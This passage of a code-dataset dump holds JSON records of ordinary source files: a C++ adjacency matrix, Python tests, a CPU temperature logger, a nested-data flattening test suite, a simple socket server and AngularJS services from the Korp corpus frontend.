"blob_id": "63a9008b01d1d4b6b7ed0ce48379e39cbc445680",
"content_id": "038bd762effea13eb5040a61cfec73014909ded0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 484,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 28,
"path": "/opendatastructures.org/cpp/AdjacencyMatrix.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * AdjacencyMatrix.cpp\r\n *\r\n * Created on: 2012-01-13\r\n * Author: morin\r\n */\r\n\r\n#include \"AdjacencyMatrix.h\"\r\n\r\nnamespace ods {\r\n\r\nAdjacencyMatrix::AdjacencyMatrix(int n0) {\r\n\tn = n0;\r\n\ta = new bool*[n];\r\n\tfor (int i = 0; i < n; i++)\r\n\t\ta[i] = new bool[n];\r\n\tfor (int i = 0; i < n; i++)\r\n\t\tfor (int j = 0; j < n; j++)\r\n\t\t\ta[i][j] = false;\r\n}\r\n\r\nAdjacencyMatrix::~AdjacencyMatrix() {\r\n\tfor (int i = 0; i < n; i++)\r\n\t\tdelete[] a[i];\r\n\tdelete[] a;\r\n}\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7169811129570007,
"avg_line_length": 19.200000762939453,
"blob_id": "ccfcb36904ceb58efb003a29aee113723903dccd",
"content_id": "b0570df28967635f3864951e1b5e5c7fd4c13956",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 5,
"path": "/opendatastructures.org/python/ods/tests/test_linearhashtable.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import ods\r\nfrom settest import exercise_set\r\n\r\ndef test_cht():\r\n exercise_set(ods.LinearHashTable())\r\n"
},
{
"alpha_fraction": 0.713178277015686,
"alphanum_fraction": 0.713178277015686,
"avg_line_length": 19.5,
"blob_id": "a2866ef9c82f26186e60175a563720cba9250532",
"content_id": "f073c1866aff15a0c79d00ab7e5ef93e486f364a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_yfasttrie.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "from nose.tools import *\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_bst():\r\n exercise_sset(ods.YFastTrie())\r\n"
}
] | 62 |
CapnOdin/temp_checker | https://github.com/CapnOdin/temp_checker | 2f1e10cfc495a64fc686359949e04f0126de314b | 0d4f65e13aadcf00d6f23022e728a7164d74a797 | 6986dfb8bbd02df3425c2c750ed0b3051d8044b3 | refs/heads/master | 2023-08-21T17:51:43.384064 | 2021-06-14T07:49:09 | 2021-06-14T07:49:09 | 404,248,099 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6396396160125732,
"alphanum_fraction": 0.6531531810760498,
"avg_line_length": 25.909090042114258,
"blob_id": "8bcace86a13027aa761c14baa56da432c9494d78",
"content_id": "10f1815ab2e10781dca8eafa27ea6e0bc3e55267",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1777,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 66,
"path": "/temp_checker/temp_checker.py",
"repo_name": "CapnOdin/temp_checker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport os.path, subprocess, sys, argparse, re, time\n\nA_ScriptDir = os.path.dirname(os.path.realpath(__file__))\nA_WorkingDir = os.getcwd()\n\ntemperature_regex = re.compile(\"\\+\\d+(\\.\\d+)?°C\")\n\ndef run_with_output(cmd, shell = False):\n\toutput = \"\"\n\tp = subprocess.Popen(cmd, shell = shell, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, universal_newlines = True)\n\twhile p.poll() is None:\n\t\tline = p.stdout.readline()\n\t\t#print(line, end = \"\")\n\t\toutput += line\n\tp.stdout.close()\n\tp.wait()\n\t\n\tif(p.returncode != 0):\n\t\tprint(\"error\")\n\t\tsys.exit(p.returncode)\n\t\n\treturn output\n\n\ndef get_temperature():\n\tmatch = temperature_regex.search(run_with_output(\"sensors | grep temp1:\", shell = True))\n\tif(match):\n\t\treturn match.group(0)\n\treturn \"\"\n\n\ndef collect_samples(timeout = 100, interval = 10):\n\topen(\"temps\", \"w\").close()\n\tstart = time.time_ns()\n\ttimeout *= 60 * 1e9\n\t\n\twhile(timeout == 0 or time.time_ns() - start < timeout):\n\t\ttry:\n\t\t\ttemp = get_temperature()\n\t\t\tprint(temp)\n\t\t\tf = open(\"temps\", \"a\")\n\t\t\tf.write(temp + \"\\n\")\n\t\t\tf.close()\n\t\t\ttime.sleep(interval)\n\t\texcept IOError:\n\t\t\ttime.sleep(0.1)\n\ndef main():\n\tparser = argparse.ArgumentParser(description = \"Script to check the CPU temerature.\")\n\t\n\tparser.add_argument(\"-i\", \"--interval\", metavar = \"NUMBER\", default = 10, type = int, help = \"set interval between each sample in secounds (10s)\")\n\tparser.add_argument(\"-t\", \"--timeout\", metavar = \"NUMBER\", default = -1, type = int, help = \"set duration where the samples will be collected in minuts, set to 0 for no timeout (-1)\")\n\t\n\targs = parser.parse_args()\n\t#try:\n\tif(args.timeout == -1):\n\t\tprint(get_temperature())\n\telse:\n\t\tcollect_samples(timeout = args.timeout, interval = args.interval)\n\t#except:\n\t#\tpass\n\t\nif __name__ == \"__main__\":\n\tmain()\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 26,
"blob_id": "9d0bca5e2634fc2387ac511aee8a52bee68d93e1",
"content_id": "f80fefaedd7f5d3a274e39bf584070558a9e14d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 1,
"path": "/temp_checker/__init__.py",
"repo_name": "CapnOdin/temp_checker",
"src_encoding": "UTF-8",
"text": "from temp_checker import *\n"
}
] | 2 |
GuruOfPython/python_test_codes | https://github.com/GuruOfPython/python_test_codes | 62d6a4303bb3b1d0fda261df76f2204cbe2a159e | cbb29ccc72339b4aaa735145e202cc4499d82ab4 | 5d86cf15ac170262de20c6928c08c2296228fcba | refs/heads/master | 2020-06-29T14:36:22.451877 | 2019-08-05T01:34:57 | 2019-08-05T01:34:57 | 200,562,039 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.499627947807312,
"alphanum_fraction": 0.5021083354949951,
"avg_line_length": 36.562110900878906,
"blob_id": "bacefa6331f6ff927400355d2808cd5fd6b076a4",
"content_id": "a97c2304fe4d16db4e2166027d91f2c22c6d5fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12095,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 322,
"path": "/test_for_upwork.py",
"repo_name": "GuruOfPython/python_test_codes",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2019 Applied Nonprofit Research. All rights reserved.\n# Requires Python 3.7+.\n\nimport itertools\nfrom typing import Dict, Tuple, List, Iterator, Optional, Any, Union\n\nimport pytest\n\ndata_types: Dict = {\n \"folder_in_root\": \"Folder\",\n \"text_in_root\": \"Simple\",\n \"list_in_folder\": \"List\",\n \"text_in_list_in_folder\": \"Simple\",\n \"int_in_list_in_folder\": \"Simple\",\n \"list_in_root\": \"List\",\n \"text_in_list\": \"Simple\",\n \"outer_nested_list\": \"List\",\n \"text_in_outer_nested_list\": \"Simple\",\n \"inner_nested_list\": \"List\",\n \"text_in_inner_nested_list\": \"Simple\",\n \"dictionary_in_inner_nested_list\": \"Dictionary\",\n \"text_in_dictionary_in_inner_nested_list\": \"Simple\",\n \"dictionary_in_root\": \"Dictionary\",\n \"text_in_dictionary\": \"Simple\",\n \"int_in_dictionary\": \"Simple\",\n \"outer_nested_dictionary\": \"Dictionary\",\n \"text_in_outer_nested_dictionary\": \"Simple\",\n \"inner_nested_dictionary\": \"Dictionary\",\n \"text_in_inner_nested_dictionary\": \"Simple\",\n \"list_in_inner_nested_dictionary\": \"List\",\n \"text_in_list_in_inner_nested_dictionary\": \"Simple\"\n}\n\[email protected]()\ndef common_values() -> Dict:\n return {\n \"text_in_folder\": \"foo\",\n \"list_in_folder\": [\n {\n \"text_in_list_in_folder\": \"a\"\n },\n {\n \"text_in_list_in_folder\": \"b\",\n \"int_in_list_in_folder\": 2\n },\n {\n \"text_in_list_in_folder\": \"c\",\n \"int_in_list_in_folder\": 3\n }\n ],\n \"outer_nested_list\": [\n {\n \"text_in_outer_nested_list\": \"a\"\n },\n {\n \"text_in_outer_nested_list\": \"b\",\n \"inner_nested_list\": [\n {}\n ]\n },\n {\n \"text_in_outer_nested_list\": \"c\",\n \"inner_nested_list\": [\n {\n \"text_in_inner_nested_list\": \"foo\"\n },\n {\n \"text_in_inner_nested_list\": \"bar\",\n \"dictionary_in_inner_nested_list\": {\n \"black\": {\"text_in_dictionary_in_inner_nested_list\": \"white\"},\n \"green\": {\"text_in_dictionary_in_inner_nested_list\": \"red\"}\n }\n }\n ]\n }\n ],\n \"dictionary_in_root\": {\n \"peter\": {\n \"text_in_dictionary\": \"a\"\n },\n \"paul\": {\n \"text_in_dictionary\": \"b\",\n \"int_in_dictionary\": 2\n },\n \"mary\": {\n \"text_in_dictionary\": \"c\",\n \"int_in_dictionary\": 3\n }\n },\n \"outer_nested_dictionary\": {\n \"peter\": {\n \"text_in_outer_nested_dictionary\": \"a\"\n },\n \"paul\": {\n \"text_in_outer_nested_dictionary\": \"b\",\n \"inner_nested_dictionary\": {\n \"red\": {}\n }\n },\n \"mary\": {\n \"text_in_outer_nested_dictionary\": \"c\",\n \"inner_nested_dictionary\": {\n \"orange\": {\n \"text_in_inner_nested_dictionary\": \"foo\"\n },\n \"yellow\": {\n \"text_in_inner_nested_dictionary\": \"bar\",\n \"list_in_inner_nested_dictionary\": [\n {\"text_in_list_in_inner_nested_dictionary\": \"black\"},\n {\"text_in_list_in_inner_nested_dictionary\": \"white\"},\n ]\n }\n }\n }\n }\n }\n\n# SO 10823877\ndef flatten(container: Union[List, Tuple]) -> Iterator:\n \"\"\"Flattens an arbitrarily nested list.\"\"\"\n for i in container:\n if isinstance(i, (list, tuple)): # I didn't know you could supply a tuple of classes...\n for j in flatten(i):\n yield j\n else:\n yield i\n\ndef _cartesian(block_values: List) -> Iterator[List[Optional[Any]]]:\n \"\"\"Starts with an arbitrarily nested list of lists, where each singly nested list represents all observed values for\n one or more columns in a spreadsheet column block. 
Yields lists representing rows of the column block.\"\"\"\n for nested in itertools.product(*block_values):\n yield list(flatten(nested))\n\ndef _unpack_as_singleton(var_id: str, values: Dict) -> Iterator[List[str]]:\n value: Optional[Any] = values.get(var_id)\n yield [[value]]\n\ndef _unpack_as_list(block: Tuple, values: List) -> Iterator[List[Optional[Any]]]:\n if values is None:\n yield [None] * len(block)\n return\n for i, element in enumerate(values):\n yield list(as_block_value(block, element))\n\ndef _unpack_as_dictionary(block: Tuple, values: Dict) -> Iterator[List[Optional[Any]]]:\n if values is None:\n yield [None] * (len(block) + 1)\n return\n for i, (key, element) in enumerate(values.items()):\n yield [key] + list(as_block_value(block, element))\n\ndef as_block_value(block: Tuple, values: Dict) -> Iterator[List[Optional[Any]]]:\n \"\"\"Takes a block of variable IDs representing a primitive, a list, or a named list (including nested lists and\n named lists) and yields lists of column values, where the columns represent a block of a larger CSV.\"\"\"\n block_values: List = [None] * len(block)\n for i, subblock in enumerate(block):\n if isinstance(subblock, str):\n block_values[i] = _unpack_as_singleton(subblock, values)\n elif isinstance(subblock, tuple):\n root_id: str = subblock[0]\n dt: str = data_types[root_id]\n if dt == \"List\":\n nested_values: Optional[List] = values.get(root_id)\n block_values[i] = _unpack_as_list(subblock[1:], nested_values)\n elif dt == \"Dictionary\":\n nested_values: Optional[Dict] = values.get(root_id)\n block_values[i] = _unpack_as_dictionary(subblock[1:], nested_values)\n else:\n raise ValueError('Variable \"%s\" (%s) is not a List or Dictionary root' % (root_id, dt))\n yield from _cartesian(block_values)\n\ndef test_singleton(common_values):\n block: Tuple = (\"text_in_folder\",)\n expected: List = [[\"foo\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_list(common_values):\n block: Tuple = ((\"list_in_folder\", \"int_in_list_in_folder\", \"text_in_list_in_folder\"),)\n expected: List = [[None, \"a\"], [2, \"b\"], [3, \"c\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_list_with_initial_singleton(common_values):\n block: Tuple = (\"text_in_folder\", (\"list_in_folder\", \"int_in_list_in_folder\", \"text_in_list_in_folder\"))\n expected: List = [[\"foo\", None, \"a\"], [\"foo\", 2, \"b\"], [\"foo\", 3, \"c\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_list_with_final_singleton(common_values):\n block: Tuple = ((\"list_in_folder\", \"int_in_list_in_folder\", \"text_in_list_in_folder\"), \"text_in_folder\")\n expected: List = [[None, \"a\", \"foo\"], [2, \"b\", \"foo\"], [3, \"c\", \"foo\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_list_with_no_columns(common_values):\n block: Tuple = ((\"list_in_folder\",),)\n expected: List = [[], [], []]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_empty_list():\n block: Tuple = ((\"list_in_folder\", \"int_in_list_in_folder\", \"text_in_list_in_folder\"),)\n expected: List = [[None, None]]\n actual: List = list(as_block_value(block, {}))\n assert actual == expected\n\ndef test_dictionary(common_values):\n block: Tuple = ((\"dictionary_in_root\", \"int_in_dictionary\", \"text_in_dictionary\"),)\n expected: List = [[\"peter\", None, 
\"a\"], [\"paul\", 2, \"b\"], [\"mary\", 3, \"c\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_dictionary_with_no_columns(common_values):\n block: Tuple = ((\"dictionary_in_root\",),)\n expected: List = [[\"peter\"], [\"paul\"], [\"mary\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_empty_dictionary():\n block: Tuple = ((\"dictionary_in_root\", \"int_in_dictionary\", \"text_in_dictionary\"),)\n expected: List = [[None, None, None]]\n actual: List = list(as_block_value(block, {}))\n assert actual == expected\n\ndef test_nested_list(common_values):\n block: Tuple = ((\n \"outer_nested_list\",\n (\n \"inner_nested_list\",\n \"text_in_inner_nested_list\"\n ),\n \"text_in_outer_nested_list\"\n ),)\n expected: List = [\n [None, \"a\"],\n [None, \"b\"],\n [\"foo\", \"c\"],\n [\"bar\", \"c\"]\n ]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_nested_dictionary(common_values):\n block: Tuple = ((\n \"outer_nested_dictionary\",\n (\n \"inner_nested_dictionary\",\n \"text_in_inner_nested_dictionary\"\n ),\n \"text_in_outer_nested_dictionary\"\n ),)\n expected: List = [\n [\"peter\", None, None, \"a\"],\n [\"paul\", None, None, \"b\"],\n [\"mary\", \"orange\", \"foo\", \"c\"],\n [\"mary\", \"yellow\", \"bar\", \"c\"]\n ]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_dictionary_in_nested_list(common_values):\n block: Tuple = ((\n \"outer_nested_list\",\n (\n \"inner_nested_list\",\n \"text_in_inner_nested_list\",\n (\n \"dictionary_in_inner_nested_list\",\n \"text_in_dictionary_in_inner_nested_list\"\n )\n ),\n \"text_in_outer_nested_list\"\n ),)\n expected: List = [\n [None, None, None, \"a\"],\n [None, None, None, \"b\"],\n [\"foo\", None, None, \"c\"],\n [\"bar\", \"black\", \"white\", \"c\"],\n [\"bar\", \"green\", \"red\", \"c\"],\n ]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_empty_nested_dictionary():\n values: Dict = {}\n block: Tuple = (\n (\n \"outer_nested_dictionary\",\n (\n \"inner_nested_dictionary\",\n \"text_in_inner_nested_dictionary\"\n ),\n \"text_in_outer_nested_dictionary\"\n ),\n )\n expected: List = [[None, None, None, None]]\n actual: List = list(as_block_value(block, values))\n assert actual == expected\n\ndef test_list_in_nested_dictionary(common_values):\n block: Tuple = ((\n \"outer_nested_dictionary\",\n (\n \"inner_nested_dictionary\",\n \"text_in_inner_nested_dictionary\",\n (\n \"list_in_inner_nested_dictionary\",\n \"text_in_list_in_inner_nested_dictionary\"\n )\n ),\n \"text_in_outer_nested_dictionary\"\n ),)\n expected: List = [\n [\"peter\", None, None, None, \"a\"],\n [\"paul\", None, None, None, \"b\"],\n [\"mary\", \"orange\", \"foo\", None, \"c\"],\n [\"mary\", \"yellow\", \"bar\", \"black\", \"c\"],\n [\"mary\", \"yellow\", \"bar\", \"white\", \"c\"],\n ]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n"
}
] | 1 |
mrrtscott/Assignment_ | https://github.com/mrrtscott/Assignment_ | 1e18035d94ef02f924a460957bc3832a2d769dc5 | dffbc0155c2f02d480729e60794b790ed0e9a0bd | fc7a5a61bb42811108bd8e56152d5d50a5c0ebd8 | refs/heads/master | 2020-04-08T09:24:11.599591 | 2018-11-26T19:34:02 | 2018-11-26T19:34:02 | 159,221,930 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7916666865348816,
"alphanum_fraction": 0.7916666865348816,
"avg_line_length": 10.5,
"blob_id": "22d44bb5ab5da1dbf61220f388e0e3d7be74bb25",
"content_id": "d72ac07793f198ac811d781bfa3b8c21b718d5fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 2,
"path": "/Assignment_1127.py",
"repo_name": "mrrtscott/Assignment_",
"src_encoding": "UTF-8",
"text": "\nimport math\nimport sys\n"
}
] | 1 |
msatul1305/raspberryPiProject | https://github.com/msatul1305/raspberryPiProject | 5ed1545f9e9d05f6d0819e6be060f153f84de4ce | 6ae791d706b9e224a314a7509c788a7ac3956fcf | b46c1455cc506a269e35ecb4af77582bd9f6167c | refs/heads/master | 2020-05-31T05:43:57.093229 | 2019-06-04T03:55:26 | 2019-06-04T03:55:26 | 190,125,554 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6778115630149841,
"alphanum_fraction": 0.6990881562232971,
"avg_line_length": 22.5,
"blob_id": "98db1c6fcd1faa1b8a8ab3d08aa22a9842a00108",
"content_id": "b3cbb4a422e55853666ba01f1d0891f77a5b3817",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 329,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 14,
"path": "/server.py",
"repo_name": "msatul1305/raspberryPiProject",
"src_encoding": "UTF-8",
"text": "import socket\ns=socket.socket()\nprint(\"socket created successfully\")\nport = 12345\ns.bind(('',port))\nprint(\"socket binded to port %s\"%(port))\ns.listen(5)\nprint (\"socket is listening...\")\nwhile True:\n\tc,addr=s.accept()\n\tprint(\"got a connection from\",addr)\n\tstr=\"thank you for connecting\"\n\tc.sendall(str.encode('utf-8'))\n\tc.close()\n"
}
] | 1 |
UAlbertaALTLab/korp-frontend | https://github.com/UAlbertaALTLab/korp-frontend | 73581e7bbec747292e3c978d175690132c00755e | 34c499573238a4451e82ce397739f856984820ce | 9467956552ba071f3a1fdf9f2731ba22f9ebde32 | refs/heads/main | 2023-04-14T17:59:00.642218 | 2021-02-20T01:26:15 | 2021-02-20T01:26:15 | 292,864,111 | 1 | 0 | MIT | 2020-09-04T14:09:26 | 2021-02-20T01:26:28 | 2021-02-25T17:11:59 | JavaScript | [
{
"alpha_fraction": 0.5076419115066528,
"alphanum_fraction": 0.5087336301803589,
"avg_line_length": 32.39583206176758,
"blob_id": "8718079e56eaeeaf7936592797018e12b872aeb9",
"content_id": "ba7ffd7b031ca47b8281b6bef4d264145de31864",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12824,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 384,
"path": "/app/scripts/struct_services.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst korpApp = angular.module(\"korpApp\")\n\n// Data service for the global filter in korp\n// Directive is duplicated in simple and extended search\n// so this directive holds all state concering the users input\n// and what possible filters and values are available\n\n// diretives calls registerScope to register for updates\n// service calls scope.update() when changes occur\nkorpApp.factory(\"globalFilterService\", function ($rootScope, $location, $q, structService) {\n const scopes = []\n\n const callDirectives = () =>\n listenerDef.promise.then(() => scopes.map((scope) => scope.update(dataObj)))\n\n // deferred for waiting for all directives to register\n var listenerDef = $q.defer()\n\n var dataObj = {\n selectedFilters: [],\n filterValues: {},\n defaultFilters: [],\n optionalFilters: [],\n attributes: {},\n mode: \"simple\",\n showDirective: false,\n }\n\n let currentData = {}\n\n const initFilters = function () {\n let filter\n const filterValues = dataObj.filterValues || {}\n\n // delete any filter values that are not in the selected filters\n for (filter in filterValues) {\n const v = filterValues[filter]\n if (!dataObj.selectedFilters.includes(filter)) {\n delete filterValues[filter]\n }\n }\n\n // create object for every filter that is selected but not yet created\n for (filter of dataObj.selectedFilters) {\n if (!(filter in filterValues)) {\n const newFilter = {}\n newFilter.value = []\n newFilter.possibleValues = []\n filterValues[filter] = newFilter\n }\n }\n\n dataObj.filterValues = filterValues\n }\n\n // only send corpora that supports all selected filters (if filterSelection is \"union\")\n const getSupportedCorpora = function () {\n const corporaPerFilter = _.map(\n dataObj.selectedFilters,\n (filter) => dataObj.attributes[filter].corpora\n )\n return _.intersection(...(corporaPerFilter || []))\n }\n\n var mergeObjects = function (...values) {\n if (_.every(values, (val) => Array.isArray(val))) {\n return _.union(...(values || []))\n } else if (_.every(values, (val) => !Array.isArray(val) && typeof val === \"object\")) {\n const newObj = {}\n const allKeys = _.union(...(_.map(values, (val) => _.keys(val)) || []))\n for (let k of allKeys) {\n const allValsForKey = _.map(values, (val) => val[k])\n const newValues = _.filter(\n allValsForKey,\n (val) => !_.isEmpty(val) || Number.isInteger(val)\n )\n newObj[k] = mergeObjects(...(newValues || []))\n }\n return newObj\n } else if (_.every(values, (val) => Number.isInteger(val))) {\n return _.reduce(values, (a, b) => a + b, 0)\n } else {\n c.error(\"Cannot merge objects a and b\")\n }\n }\n\n // get data for selected attributes from backend, merges values from different corpora\n // and flattens data structure?\n const getData = function () {\n const corpora = getSupportedCorpora()\n\n const opts = {}\n if (dataObj.attributes[_.last(dataObj.defaultFilters)].settings.type === \"set\") {\n opts.split = true\n }\n return structService\n .getStructValues(corpora, dataObj.selectedFilters, opts)\n .then(function (data) {\n currentData = {}\n for (let corpus of corpora) {\n const object = data[corpus.toUpperCase()]\n for (let k in object) {\n const v = object[k]\n if (!(k in currentData)) {\n currentData[k] = v\n } else {\n currentData[k] = mergeObjects(currentData[k], v)\n }\n }\n }\n updateData()\n })\n }\n\n // when user selects an attribute, update all possible filter values and counts\n var updateData = function () {\n let filter\n var collectAndSum = function (filters, elements, parentSelected) {\n 
const filter = filters[0]\n const children = []\n const { possibleValues } = dataObj.filterValues[filter]\n const currentValues = dataObj.filterValues[filter].value\n let sum = 0\n const values = []\n let include = false\n for (let value in elements) {\n var childCount\n const child = elements[value]\n const selected = currentValues.includes(value) || _.isEmpty(currentValues)\n\n // filter of any parent values that do not support the child values\n include = include || selected\n\n if (Number.isInteger(child)) {\n childCount = child\n include = true\n } else {\n ;[childCount, include] = collectAndSum(\n _.tail(filters),\n child,\n parentSelected && selected\n )\n }\n\n if (include && parentSelected) {\n possibleValues.push([value, childCount])\n } else {\n possibleValues.push([value, 0])\n }\n if (selected && include) {\n sum += childCount\n }\n\n values.push(value)\n }\n\n return [sum, include]\n }\n\n // reset all filters\n for (filter of dataObj.selectedFilters) {\n dataObj.filterValues[filter].possibleValues = []\n }\n\n // recursively decide the counts of all values\n collectAndSum(dataObj.selectedFilters, currentData, true)\n\n // merge duplicate child values\n for (filter of dataObj.selectedFilters) {\n const possibleValuesTmp = {}\n for (let [value, count] of dataObj.filterValues[filter].possibleValues) {\n if (!(value in possibleValuesTmp)) {\n possibleValuesTmp[value] = 0\n }\n possibleValuesTmp[value] += count\n }\n dataObj.filterValues[filter].possibleValues = []\n for (let k in possibleValuesTmp) {\n const v = possibleValuesTmp[k]\n dataObj.filterValues[filter].possibleValues.push([k, v])\n }\n\n dataObj.filterValues[filter].possibleValues.sort(function (a, b) {\n if (a[0] < b[0]) {\n return -1\n } else if (a[0] > b[0]) {\n return 1\n } else {\n return 0\n }\n })\n }\n }\n\n const addNewFilter = function (filter, update) {\n dataObj.selectedFilters.push(filter)\n initFilters()\n if (update) {\n return getData()\n }\n }\n\n const setFromLocation = function (globalFilter) {\n let attrKey\n if (!globalFilter) {\n return\n }\n if (!dataObj.filterValues) {\n return\n }\n const parsedFilter = JSON.parse(atob(globalFilter))\n for (attrKey in parsedFilter) {\n const attrValues = parsedFilter[attrKey]\n if (!(attrKey in dataObj.filterValues) && dataObj.optionalFilters.includes(attrKey)) {\n addNewFilter(attrKey, false)\n dataObj.filterValues[attrKey] = {}\n }\n\n if (dataObj.selectedFilters.includes(attrKey)) {\n dataObj.filterValues[attrKey].value = attrValues\n }\n }\n\n for (attrKey in dataObj.filterValues) {\n if (!(attrKey in parsedFilter)) {\n dataObj.filterValues[attrKey].value = []\n }\n }\n }\n\n const makeCqp = function () {\n const exprs = []\n const andArray = []\n for (var attrKey in dataObj.filterValues) {\n const attrValues = dataObj.filterValues[attrKey]\n const attrType = dataObj.attributes[attrKey].settings.type\n var op = attrType === \"set\" ? 
\"contains\" : \"=\"\n andArray.push(\n attrValues.value.map((attrValue) => ({\n type: `_.${attrKey}`,\n op,\n val: regescape(attrValue),\n }))\n )\n }\n\n return [{ and_block: andArray }]\n }\n\n const updateLocation = function () {\n const rep = {}\n for (let attrKey in dataObj.filterValues) {\n const attrValues = dataObj.filterValues[attrKey]\n if (!_.isEmpty(attrValues.value)) {\n rep[attrKey] = attrValues.value\n }\n }\n if (!_.isEmpty(rep)) {\n $location.search(\"global_filter\", btoa(JSON.stringify(rep)))\n $rootScope.globalFilter = makeCqp()\n } else {\n $location.search(\"global_filter\", null)\n $rootScope.globalFilter = null\n }\n }\n\n $rootScope.$on(\"corpuschooserchange\", function () {\n if (settings.corpusListing.selected.length === 0) {\n dataObj.showDirective = false\n } else {\n const [newDefaultFilters, defAttributes] = settings.corpusListing.getDefaultFilters()\n const [newOptionalFilters, possAttributes] = settings.corpusListing.getCurrentFilters()\n\n if (_.isEmpty(newDefaultFilters) && _.isEmpty(newOptionalFilters)) {\n dataObj.showDirective = false\n $location.search(\"global_filter\", null)\n for (let filter of dataObj.selectedFilters) {\n dataObj.filterValues[filter].value = []\n }\n } else {\n dataObj.showDirective = true\n dataObj.defaultFilters = newDefaultFilters\n dataObj.optionalFilters = newOptionalFilters\n dataObj.attributes = _.extend({}, defAttributes, possAttributes)\n\n dataObj.selectedFilters = newDefaultFilters.slice()\n\n initFilters()\n\n setFromLocation($location.search().global_filter)\n getData()\n updateLocation()\n callDirectives()\n }\n }\n $rootScope.globalFilterDef.resolve()\n })\n\n $rootScope.$watch(\n () => $location.search().global_filter,\n (filter) => setFromLocation(filter)\n )\n\n return {\n registerScope(scope) {\n scopes.push(scope)\n // TODO this will not work with parallel mode since only one directive is used :(\n if (scopes.length === 2) {\n listenerDef.resolve()\n }\n },\n removeFilter(filter) {\n _.remove(dataObj.selectedFilters, filter)\n initFilters()\n getData()\n updateLocation()\n },\n addNewFilter,\n valueChange(filter) {\n updateLocation()\n updateData()\n },\n }\n})\n\nkorpApp.factory(\"structService\", ($http, $q) => ({\n getStructValues(corpora, attributes, { count, returnByCorpora, split }) {\n const def = $q.defer()\n\n const structValue = attributes.join(\">\")\n if (count == null) {\n count = true\n }\n if (returnByCorpora == null) {\n returnByCorpora = true\n }\n\n const params = {\n corpus: corpora.join(\",\"),\n struct: structValue,\n count,\n }\n\n if (split) {\n params.split = _.last(attributes)\n }\n\n const conf = {\n url: settings.korpBackendURL + \"/struct_values\",\n params,\n method: \"GET\",\n headers: {},\n }\n\n _.extend(conf.headers, model.getAuthorizationHeader())\n\n $http(conf).then(function ({ data }) {\n let result, values\n if (data.ERROR) {\n def.reject()\n return\n }\n\n if (returnByCorpora) {\n result = {}\n for (corpora in data.corpora) {\n values = data.corpora[corpora]\n result[corpora] = values[structValue]\n }\n def.resolve(result)\n } else {\n result = []\n for (corpora in data.corpora) {\n values = data.corpora[corpora]\n result = result.concat(values[structValue])\n }\n def.resolve(result)\n }\n })\n\n return def.promise\n },\n}))\n"
},
{
"alpha_fraction": 0.483151912689209,
"alphanum_fraction": 0.4848865866661072,
"avg_line_length": 31.988555908203125,
"blob_id": "33d9290d8740f8975a7135d5cf4c9305f3b427d7",
"content_id": "06c43d5e6eaed4e2c51846518e86c0460d5ea6ce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 23060,
"license_type": "permissive",
"max_line_length": 270,
"num_lines": 699,
"path": "/app/scripts/search_controllers.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
